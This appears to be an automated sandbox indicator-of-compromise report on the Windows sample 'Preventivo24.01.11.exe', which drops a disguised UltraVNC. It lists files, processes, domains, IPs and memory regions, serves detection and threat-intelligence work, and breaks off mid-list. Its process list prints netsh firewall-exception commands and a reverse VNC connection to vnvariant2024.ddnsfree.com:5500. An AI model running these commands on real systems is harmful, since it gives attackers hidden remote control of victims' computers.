IOC Report
Preventivo24.01.11.exe

loading gif

Files

File Path
Type
Category
Malicious
Preventivo24.01.11.exe
PE32 executable (GUI) Intel 80386, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\taskhost.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\viewer.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\vnchooks.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Games\IDD.txt
ASCII text, with CRLF line terminators
dropped
C:\Games\WinVNC.log
ASCII text, with CRLF, LF line terminators
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\22dc0223-1fa2-493b-9b30-3ddc1f4be2d9.tmp
JSON data
modified
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
JSON data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, Windows 2000/XP setup, 66791 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)
PostScript document text
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.6304
PostScript document text
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)
PostScript document text
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)
PostScript document text
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.6304
PostScript document text
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING
data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents
SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal
SQLite Rollback Journal
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin
data
dropped
C:\Users\user\AppData\Local\Temp\MSI5406.tmp
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\MSI54A3.tmp
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\MSI54C4.tmp
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\MSI7935f.LOG
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-01-23 12-08-05-283.log
ASCII text, with very long lines (393)
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
ASCII text, with very long lines (393), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\17c198f6-dee4-4333-a45e-2d68a935f042.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\7b77236c-9ec4-4c37-b7fe-9f4cc6be4abd.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\b3834f64-b555-4a46-82f6-4b7902bd13e5.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 647360
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\cec28c92-d6c6-474c-8465-91d556131ed3.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
dropped
C:\Users\user\AppData\Local\Temp\shi5398.tmp
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\TempFolder\~.pdf
PDF document, version 1.7, 1 pages
dropped
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UVncVirtualDisplay\UVncVirtualDisplay.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UVncVirtualDisplay\UVncVirtualDisplay.inf
Windows setup INFormation
modified
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UVncVirtualDisplay\uvncvirtualdisplay.cat
data
dropped
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UltraVNC.ini
Generic INItialization configuration [admin]
dropped
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\c.cmd
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\cmd.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\cmmc.cmd
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ddengine.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\on.cmd
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\once.cmd
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\powercfg.msi
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Dec 11 11:47:44 2009, Security: 0, Code page: 1252, Revision Number: {3A995974-27F0-4693-BBBA-215A8CDC3544}, Number of Words: 2, Subject: Your Application, Author: Your Company, Name of Creating Application: Advanced Installer 17.3 build 2e9bb285, Template: ;1033, Comments: This installer database contains the logic and data required to install Your Application., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
dropped
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\main1.msi
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {1CBDA787-08B6-4366-B2DC-C0D053E322DE}, Number of Words: 8, Subject: Photo and vn, Author: Photo and Fax Vn, Name of Creating Application: Photo and vn (Evaluation Installer), Template: ;1033, Comments: This installer database contains the logic and data required to install Photo and vn. (Evaluation Installer), Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Sun Jan 14 08:14:24 2024, Last Saved Time/Date: Sun Jan 14 08:14:24 2024, Last Printed: Sun Jan 14 08:14:24 2024, Number of Pages: 450
dropped
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\holder0.aiph
data
dropped
\Device\ConDrv
ASCII text, with CRLF, CR line terminators
dropped
\Device\Null
ASCII text, with CRLF, CR line terminators
dropped
There are 61 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\Preventivo24.01.11.exe
C:\Users\user\Desktop\Preventivo24.01.11.exe
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
malicious
C:\Windows\SysWOW64\reg.exe
Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Games\c.cmd" "
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
malicious
C:\Windows\SysWOW64\reg.exe
Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\cmd.txt"
malicious
C:\Windows\SysWOW64\cmd.exe
cmd
malicious
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL
malicious
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
malicious
C:\Games\taskhost.exe
C:\Games\taskhost.exe -autoreconnect ID:5402254 -connect vnvariant2024.ddnsfree.com:5500 -run
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Games\once.cmd" "
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
malicious
C:\Windows\SysWOW64\reg.exe
Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
malicious
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\main1.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\Preventivo24.01.11.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1706007874 " AI_EUIMSI="
C:\Games\viewer.exe
C:\Games\viewer.exe" /HideWindow "C:\Games\cmmc.cmd
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\wbem\WMIC.exe
wmic process where (name="taskhost.exe") get commandline
C:\Windows\SysWOW64\findstr.exe
findstr /i "taskhost.exe"
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\~.pdf
C:\Games\viewer.exe
C:\Games\viewer.exe /HideWindow C:\Games\c.cmd
C:\Windows\SysWOW64\timeout.exe
timeout /t 1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
C:\Windows\SysWOW64\mode.com
Mode 90,20
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1568,i,6034362121281620577,8616152877679475302,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
C:\Windows\SysWOW64\taskkill.exe
taskkill /im rundll32.exe /f
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Windows\SysWOW64\mode.com
Mode 90,20
C:\Windows\SysWOW64\taskkill.exe
taskkill /im rundll32.exe /f
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Windows\SysWOW64\wbem\WMIC.exe
wmic process where (name="taskhost.exe") get commandline
C:\Windows\SysWOW64\findstr.exe
findstr /i "taskhost.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /im rundll32.exe /f
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Games\viewer.exe
C:\Games\viewer.exe /HideWindow C:\Games\once.cmd
C:\Games\viewer.exe
C:\Games\viewer.exe /HideWindow C:\Games\cmmc.cmd
C:\Windows\SysWOW64\timeout.exe
timeout /t 20
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\wbem\WMIC.exe
wmic process where (name="taskhost.exe") get commandline
C:\Windows\SysWOW64\findstr.exe
findstr /i "taskhost.exe"
C:\Windows\SysWOW64\timeout.exe
timeout /t 20
C:\Windows\SysWOW64\timeout.exe
timeout /t 20
There are 39 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://html4/loose.dtd
unknown
http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1
unknown
https://sectigo.com/CPS0
unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
unknown
http://ocsp.sectigo.com0
unknown
http://ocsp.thawte.com0
unknown
http://www.pdf-tools.com
unknown
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
unknown
https://www.uvnc.com
unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
unknown
http://.css
unknown
http://www.example.com/download/updates.txt
93.184.216.34
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
unknown
https://forum.uvnc.com
unknown
https://www.uvnc.comcmd
unknown
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0
unknown
https://www.thawte.com/cps0/
unknown
https://forum.uvnc.comvncMenu::WndProc
unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
unknown
http://oneocsp.microe
unknown
https://www.thawte.com/repository0W
unknown
https://www.advancedinstaller.com
unknown
https://www.uvnc.comhttps://forum.uvnc.comnet
unknown
http://java.sun.com/products/plugin/index.html#download
unknown
http://.jpg
unknown
There are 16 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
www.example.com
93.184.216.34
vnvariant2024.ddnsfree.com
140.228.29.110

IPs

IP
Domain
Country
Malicious
184.25.164.138
unknown
United States
93.184.216.34
www.example.com
European Union
140.228.29.110
vnvariant2024.ddnsfree.com
United States
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.ApplicationCompany
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
@%SystemRoot%\System32\ci.dll,-100
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
@%SystemRoot%\System32\ci.dll,-101
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
@%SystemRoot%\system32\dnsapi.dll,-103
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
@%SystemRoot%\System32\fveui.dll,-843
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
@%SystemRoot%\System32\fveui.dll,-844
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
@%SystemRoot%\System32\wuaueng.dll,-400
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
@%SystemRoot%\system32\NgcRecovery.dll,-100
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
@%systemroot%\system32\FirewallControlPanel.dll,-12122
There are 2 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
2AC0000
trusted library allocation
page read and write
836F000
heap
page read and write
3250000
heap
page read and write
2F54000
heap
page read and write
34A1000
heap
page read and write
2F54000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
5549000
heap
page read and write
33B4000
heap
page read and write
3412000
heap
page read and write
33B4000
heap
page read and write
2F54000
heap
page read and write
34A1000
heap
page read and write
2F50000
heap
page read and write
6CC000
unkown
page readonly
2D90000
heap
page read and write
33E0000
trusted library allocation
page read and write
2F00000
heap
page read and write
2F54000
heap
page read and write
2EA0000
trusted library allocation
page read and write
340C000
heap
page read and write
34A1000
heap
page read and write
2F54000
heap
page read and write
2AC0000
trusted library allocation
page read and write
119E000
stack
page read and write
2AC0000
trusted library allocation
page read and write
B9F000
stack
page read and write
3144000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
27CC000
stack
page read and write
324D000
stack
page read and write
2EA0000
trusted library allocation
page read and write
3371000
heap
page read and write
2F55000
heap
page read and write
6E3000
unkown
page readonly
2EA0000
trusted library allocation
page read and write
6FC000
unkown
page readonly
82A1000
heap
page read and write
33B4000
heap
page read and write
3144000
heap
page read and write
33B4000
heap
page read and write
3144000
heap
page read and write
33E0000
trusted library allocation
page read and write
559A000
heap
page read and write
334E000
stack
page read and write
34A1000
heap
page read and write
33E0000
trusted library allocation
page read and write
82A4000
heap
page read and write
33B4000
heap
page read and write
3397000
heap
page read and write
2F55000
heap
page read and write
33B4000
heap
page read and write
2AC0000
trusted library allocation
page read and write
552D000
heap
page read and write
524F000
stack
page read and write
34A1000
heap
page read and write
2F54000
heap
page read and write
3440000
heap
page read and write
8345000
heap
page read and write
BB0000
unclassified section
page readonly
CDE000
stack
page read and write
351C000
stack
page read and write
2AC0000
trusted library allocation
page read and write
9A9000
unkown
page readonly
33B4000
heap
page read and write
2EA0000
trusted library allocation
page read and write
2F54000
heap
page read and write
2F54000
heap
page read and write
2F54000
heap
page read and write
2E6E000
stack
page read and write
33B4000
heap
page read and write
2F55000
heap
page read and write
34A1000
heap
page read and write
E3C000
stack
page read and write
2F54000
heap
page read and write
33E2000
heap
page read and write
2EA0000
trusted library allocation
page read and write
33E0000
trusted library allocation
page read and write
9BF000
unkown
page write copy
34A1000
heap
page read and write
34A1000
heap
page read and write
3463000
heap
page read and write
34A1000
heap
page read and write
2DF0000
heap
page read and write
34A1000
heap
page read and write
3270000
heap
page read and write
34A1000
heap
page read and write
3144000
heap
page read and write
343C000
heap
page read and write
34A1000
heap
page read and write
2AC0000
trusted library allocation
page read and write
339A000
heap
page read and write
34A1000
heap
page read and write
2F54000
heap
page read and write
2EA0000
trusted library allocation
page read and write
33B4000
heap
page read and write
34A1000
heap
page read and write
3403000
heap
page read and write
34A1000
heap
page read and write
3436000
heap
page read and write
3144000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
2F54000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
33B5000
heap
page read and write
2F54000
heap
page read and write
33B4000
heap
page read and write
2AC0000
trusted library allocation
page read and write
3371000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
2EA0000
trusted library allocation
page read and write
9A4000
heap
page read and write
2F54000
heap
page read and write
2F54000
heap
page read and write
3144000
heap
page read and write
34A1000
heap
page read and write
2F54000
heap
page read and write
2AC0000
trusted library allocation
page read and write
5568000
heap
page read and write
2E30000
unclassified section
page readonly
3648000
heap
page read and write
34A1000
heap
page read and write
F0B000
heap
page read and write
3CA4000
heap
page read and write
3144000
heap
page read and write
3144000
heap
page read and write
33B4000
heap
page read and write
9A4000
heap
page read and write
34A1000
heap
page read and write
63C000
stack
page read and write
2710000
heap
page read and write
34A1000
heap
page read and write
2EA0000
trusted library allocation
page read and write
2F54000
heap
page read and write
34A1000
heap
page read and write
C3D000
stack
page read and write
34A1000
heap
page read and write
46AE000
stack
page read and write
33F9000
heap
page read and write
34A1000
heap
page read and write
337E000
stack
page read and write
2F54000
heap
page read and write
3144000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
82B3000
heap
page read and write
8311000
heap
page read and write
557D000
heap
page read and write
2AC0000
trusted library allocation
page read and write
3144000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
F01000
heap
page read and write
2AC0000
trusted library allocation
page read and write
368E000
stack
page read and write
34A1000
heap
page read and write
2F54000
heap
page read and write
34A1000
heap
page read and write
5565000
heap
page read and write
33B4000
heap
page read and write
33B4000
heap
page read and write
2AC0000
trusted library allocation
page read and write
34A1000
heap
page read and write
33B4000
heap
page read and write
33B5000
heap
page read and write
33B4000
heap
page read and write
23DF000
stack
page read and write
34A1000
heap
page read and write
3144000
heap
page read and write
3144000
heap
page read and write
34A1000
heap
page read and write
3CAF000
heap
page read and write
559A000
heap
page read and write
2AC0000
trusted library allocation
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
33B4000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
2EA0000
trusted library allocation
page read and write
8368000
heap
page read and write
5425000
heap
page read and write
70F0000
heap
page read and write
342D000
heap
page read and write
34A1000
heap
page read and write
EEF000
heap
page read and write
2D70000
heap
page read and write
9DC0000
direct allocation
page read and write
34A1000
heap
page read and write
CA0000
heap
page read and write
2F54000
heap
page read and write
3145000
heap
page read and write
34A1000
heap
page read and write
33B4000
heap
page read and write
34A1000
heap
page read and write
6FC000
unkown
page readonly
730000
unkown
page write copy
34A1000
heap
page read and write
3B5A000
heap
page read and write
34A1000
heap
page read and write
9A4000
heap
page read and write
34A1000
heap
page read and write
2F54000
heap
page read and write
34A1000
heap
page read and write
2F54000
heap
page read and write
2F54000
heap
page read and write
2C2E000
stack
page read and write
5506000
heap
page read and write
2F54000
heap
page read and write
33B5000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
32F7000
heap
page read and write
136C000
stack
page read and write
3414000
heap
page read and write
2EA0000
trusted library allocation
page read and write
2AC0000
trusted library allocation
page read and write
3144000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
E20000
heap
page read and write
6F4E000
stack
page read and write
34A1000
heap
page read and write
345A000
heap
page read and write
5260000
heap
page read and write
82C9000
heap
page read and write
2F00000
unclassified section
page readonly
34A1000
heap
page read and write
33B5000
heap
page read and write
A829000
heap
page read and write
FF0000
unclassified section
page readonly
33B4000
heap
page read and write
2F54000
heap
page read and write
93F000
stack
page read and write
960000
unkown
page readonly
2F55000
heap
page read and write
533E000
stack
page read and write
3144000
heap
page read and write
34A1000
heap
page read and write
33B5000
heap
page read and write
D50000
unkown
page readonly
34A1000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
9A4000
heap
page read and write
F05000
heap
page read and write
34A1000
heap
page read and write
33B4000
heap
page read and write
1465000
heap
page read and write
38E2000
heap
page read and write
3144000
heap
page read and write
A8A8000
heap
page read and write
34A1000
heap
page read and write
9C3000
unkown
page readonly
3144000
heap
page read and write
34A1000
heap
page read and write
3459000
heap
page read and write
34A1000
heap
page read and write
829D000
heap
page read and write
2C6E000
stack
page read and write
A867000
heap
page read and write
2EA0000
trusted library allocation
page read and write
34A1000
heap
page read and write
3444000
heap
page read and write
8110000
direct allocation
page read and write
2AC0000
trusted library allocation
page read and write
3A0000
unclassified section
page readonly
33B4000
heap
page read and write
2F54000
heap
page read and write
559A000
heap
page read and write
34A1000
heap
page read and write
33BE000
stack
page read and write
2EA0000
trusted library allocation
page read and write
2F54000
heap
page read and write
3B57000
heap
page read and write
34A1000
heap
page read and write
2D8E000
stack
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
DFF000
stack
page read and write
9C3000
unkown
page readonly
2F54000
heap
page read and write
2EA0000
trusted library allocation
page read and write
34A1000
heap
page read and write
2CC8000
heap
page read and write
3144000
heap
page read and write
91B000
stack
page read and write
3431000
heap
page read and write
8343000
heap
page read and write
3144000
heap
page read and write
2F54000
heap
page read and write
37B8000
heap
page read and write
E78000
heap
page read and write
2F54000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
364D000
heap
page read and write
2EA0000
trusted library allocation
page read and write
33B4000
heap
page read and write
2F55000
heap
page read and write
3144000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
38E0000
heap
page read and write
33B4000
heap
page read and write
2F54000
heap
page read and write
3144000
heap
page read and write
34A1000
heap
page read and write
2F54000
heap
page read and write
8328000
heap
